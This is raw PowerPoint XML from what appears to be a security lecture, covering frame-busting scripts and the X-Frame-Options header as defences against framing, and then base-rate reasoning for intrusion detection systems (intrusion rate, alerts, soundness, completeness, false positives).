              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Up Arrow Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882086" y="4143731"/>
            <a:ext cx="7379826" cy="2097621"/>
          </a:xfrm>
          <a:prstGeom prst="upArrowCallout">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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the page with this script is embedded in a frame, then it will escape out of the frame and replace the embedding page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7834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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074"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391" y="4368558"/>
            <a:ext cx="6448425" cy="2105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228600"/>
            <a:ext cx="8343608" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>X-Frame-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>DENY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The page cannot be embedded in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>SAMEORIGIN: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The page can only be framed on a page with the same 	domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>ALLOW-FROM origin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The page can only be framed on a page with a specific 	other domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="3943350"/>
            <a:ext cx="2819400" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:miter lim="800000"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can limit flexibility and might not work on older browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94511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Theory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base Rate, fallacies, and detection systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1253879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59</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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Ω</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> be the set of all possible events. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Audit records produced on a host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network packets seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2515620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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="control-flow-hij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5532"/>
            <a:ext cx="9144000" cy="4243294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2362200"/>
            <a:ext cx="6705600" cy="3657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rgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76201" y="2286000"/>
            <a:ext cx="3124200" cy="2209800"/>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30499296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60</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8382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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Oval 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2819400"/>
            <a:ext cx="1828800" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120329" y="4780052"/>
            <a:ext cx="2438400" cy="1087348"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41003"/>
              <a:gd name="adj2" fmla="val -95735"/>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Set of intrusion events </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4648201" y="4495800"/>
            <a:ext cx="2669974" cy="1371600"/>
            <a:chOff x="4648201" y="4495800"/>
            <a:chExt cx="2669974" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Folded Corner 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648201" y="4495800"/>
              <a:ext cx="2669974" cy="1371600"/>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91440" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Intrusion Rate:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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887" y="4953000"/>
              <a:ext cx="1498600" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="609600"/>
            <a:ext cx="6626233" cy="1815882"/>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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: IDS Received 1,000,000 packets. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>20 of them corresponded to an intrusion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>intrusion rate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[I] is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[I] = 20/1,000,000  = .00002</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4906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61</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8382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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Oval 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2819400"/>
            <a:ext cx="1828800" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383844" y="3138311"/>
            <a:ext cx="762000" cy="784578"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangular Callout 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120329" y="4780052"/>
            <a:ext cx="2438400" cy="934948"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 53734"/>
              <a:gd name="adj2" fmla="val -148674"/>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Set of alerts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 1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887" y="5029200"/>
            <a:ext cx="1498600" cy="762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pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Folded Corner 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648201" y="4343400"/>
            <a:ext cx="2669974" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">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228600" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert Rate:</a:t>
            </a:r>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138" y="4979811"/>
            <a:ext cx="1562100" cy="736600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4521982" y="1884452"/>
            <a:ext cx="2438400" cy="934948"/>
            <a:chOff x="4521982" y="1884452"/>
            <a:chExt cx="2438400" cy="934948"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangular Callout 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4521982" y="1884452"/>
              <a:ext cx="2438400" cy="934948"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -67794"/>
                <a:gd name="adj2" fmla="val 101868"/>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Sound</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 1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482" y="2406649"/>
              <a:ext cx="787400" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3137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62</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8382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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Oval 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2819400"/>
            <a:ext cx="1828800" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2686050"/>
            <a:ext cx="2667000" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangular Callout 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4521982" y="1884452"/>
            <a:ext cx="2438400" cy="934948"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47539"/>
              <a:gd name="adj2" fmla="val 98849"/>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Complete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>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482" y="2419350"/>
            <a:ext cx="787400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219383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63</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8382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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2892230" y="2819400"/>
            <a:ext cx="3359541" cy="1409700"/>
            <a:chOff x="2209800" y="2819400"/>
            <a:chExt cx="3359541" cy="1409700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2819400"/>
              <a:ext cx="2209800" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3269859" y="2819400"/>
              <a:ext cx="2299482" cy="1409700"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="lt1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5102030" y="1600200"/>
            <a:ext cx="2793218" cy="934948"/>
            <a:chOff x="4521982" y="1884452"/>
            <a:chExt cx="2793218" cy="934948"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangular Callout 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4521982" y="1884452"/>
              <a:ext cx="2793218" cy="934948"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -47539"/>
                <a:gd name="adj2" fmla="val 98849"/>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False Positive</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRP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041" y="2433461"/>
              <a:ext cx="927100" cy="241300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1583879" y="1577709"/>
            <a:ext cx="2793218" cy="934948"/>
            <a:chOff x="1120329" y="1600200"/>
            <a:chExt cx="2793218" cy="934948"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangular Callout 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1120329" y="1600200"/>
              <a:ext cx="2793218" cy="934948"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
